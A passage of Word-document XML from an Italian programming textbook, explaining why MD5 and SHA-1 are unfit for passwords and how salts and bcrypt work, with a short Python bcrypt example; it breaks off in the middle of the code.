        <w:t xml:space="preserve">— enormi database precomputati di milioni di password comuni e loro hash MD5/SHA-1. La cracckatura è una semplice ricerca.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Servizi pubblici come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CrackStation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">crackstation.net</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) offrono questa lookup gratuitamente. Inserisci un hash MD5 e in millisecondi sai la password originale, se è una password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comune</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(cioè in qualunque dizionario di breach precedenti).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="315"/>
    <w:bookmarkStart w:id="316" w:name="vulnerabilità-intrinseche-di-md5-e-sha-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerabilità intrinseche di MD5 e SHA-1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Oltre alla velocità:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MD5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è considerato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">rotto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dal 2004: è possibile generare collisioni (due input diversi con lo stesso output) in minuti su un PC normale. Per le password questo non è il problema principale (basta la velocità) ma è il chiodo finale nella bara.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SHA-1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dichiarato deprecato da NIST nel 2011. Nel 2017 Google e CWI Amsterdam hanno dimostrato pubblicamente una collisione SHA-1 (attacco</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SHAttered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): hanno generato due PDF diversi con lo stesso hash SHA-1. Per le password, idem: la velocità è il problema principale, e SHA-1 è troppo veloce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se trovi MD5 o SHA-1 (o anche SHA-256) usati per le password in produzione,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">non sono</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">leggermente datati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: sono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">una vulnerabilità grave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, da correggere subito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="316"/>
    <w:bookmarkEnd w:id="317"/>
    <w:bookmarkStart w:id="321" w:name="il-salt-cosa-è-e-perché-è-obbligatorio"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="530" w:name="sec_7_5"/>
      <w:r>
        <w:t xml:space="preserve">7.5 Il salt: cosa è e perché è obbligatorio</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anche un buon algoritmo di hash, usato male, è insicuro. Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è la difesa contro un’intera famiglia di attacchi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="318" w:name="il-problema-senza-salt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il problema senza salt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se hashato due utenti con la stessa password producono</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">lo stesso hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario     → hash(MioSegreto123) = "5f4dcc3b5aa765d61d8327deb882cf99..."</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">giulia    → hash(MioSegreto123) = "5f4dcc3b5aa765d61d8327deb882cf99..."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conseguenze:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’attaccante che vede il database sa che due utenti hanno la stessa password.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Già un’informazione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’attaccante può cracckare una password sola e averle entrambe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le rainbow table funzionano</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: hash precomputati di password comuni si trovano subito.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="318"/>
    <w:bookmarkStart w:id="319" w:name="la-difesa-il-salt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La difesa: il salt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">salt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">stringa casuale unica per ogni password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, generata al momento della registrazione, salvata insieme all’hash. La password viene hashata insieme al salt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario:   salt = "8x7K2n9P!"      hash(salt + "MioSegreto123") = "abc...def"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">giulia:  salt = "qW3z!Mn8&amp;"      hash(salt + "MioSegreto123") = "xyz...ghi"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stesso input (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MioSegreto123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), salt diverso → hash diverso. L’attaccante:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non vede più le coincidenze</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tra utenti con stessa password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non può usare rainbow table precomputate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">— dovrebbe ricalcolarle per ogni salt diverso, cioè per ogni utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deve fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">forza bruta separata per ogni utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, raddoppiando il costo per ogni utente in più.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="319"/>
    <w:bookmarkStart w:id="320" w:name="requisiti-di-un-salt-valido"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Requisiti di un salt valido</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Casuale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: generato con un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Cryptographically Secure Pseudo-Random Number Generator</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(CSPRNG). In Python:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">secrets.token_bytes(16)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Mai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">random.randint()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Lungo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: almeno 16 byte (128 bit). bcrypt usa 16 byte, Argon2 ne raccomanda 16+.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Unico per ogni password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: nuovo a ogni registrazione, nuovo a ogni cambio password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Non segreto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il salt si salva nel database insieme all’hash, in chiaro. Non è una chiave: serve solo a personalizzare l’hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">💡</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt e Argon2 fanno tutto questo automaticamente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Generano un salt sicuro a ogni hash, lo includono nella stringa di output, lo recuperano automaticamente in fase di verifica. Tu non devi gestire il salt manualmente — basta usare la libreria nel modo standard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="320"/>
    <w:bookmarkEnd w:id="321"/>
    <w:bookmarkStart w:id="326" w:name="bcrypt-la-scelta-sicura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="sec_7_6"/>
      <w:r>
        <w:t xml:space="preserve">7.6 bcrypt: la scelta sicura</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è una funzione di hashing per password progettata nel 1999 da Niels Provos e David Mazières. Quasi 30 anni dopo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">è ancora una scelta perfettamente solida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, raccomandata da OWASP. Caratteristiche:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Salt automatico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: 16 byte casuali per ogni hash, integrati nella stringa risultato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cost factor configurabile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: parametro che controlla quante iterazioni di hashing fare. Cost 12 =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2^12 = 4096</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iterazioni interne. Aumentando il cost, l’hash diventa esponenzialmente più lento.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Tipico oggi: cost 12 o 13.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1122"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Output autocontenuto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una singola stringa contiene algoritmo, cost, salt, hash. Non devi memorizzare campi separati nel DB.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="322" w:name="anatomia-di-un-hash-bcrypt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anatomia di un hash bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$2b$12$8x7K2n9PqW3zMn8aBcDeFugOoO0ggTV4TtgJWxR8U5w2vJk7rQHxq</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└┬┘└┬┘ └────────────────────┬───────────────────────────────┘</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │  │                       │</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │  │                       └─ salt (22 char) + hash (31 char)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> │  └─ cost factor: 12 (4096 iterazioni)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> └─ versione algoritmo: 2b (la più recente di bcrypt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">separa i campi. Tutto l’hash è una singola stringa di 60 caratteri ASCII salvabile in una colonna</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">TEXT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del database.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="322"/>
    <w:bookmarkStart w:id="323" w:name="installare-bcrypt-in-python"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Installare bcrypt in Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel terminale (con ambiente virtuale attivo):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install bcrypt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="323"/>
    <w:bookmarkStart w:id="324" w:name="hashare-e-verificare-una-password"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hashare e verificare una password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># REGISTRAZIONE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password_in_chiaro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"MioSegreto123!"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># bcrypt vuole bytes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(password_in_chiaro, bcrypt.gensalt(rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(hash_password)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># b'$2b$12$8x7K2n9PqW3zMn8aBcDeFugOoO0ggTV4TtgJWxR8U5w2vJk7rQHxq'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Salva 'hash_password' nel database (decodificalo a stringa per il DB)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># cur.execute("INSERT INTO utenti (username, password) VALUES (?, ?)",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
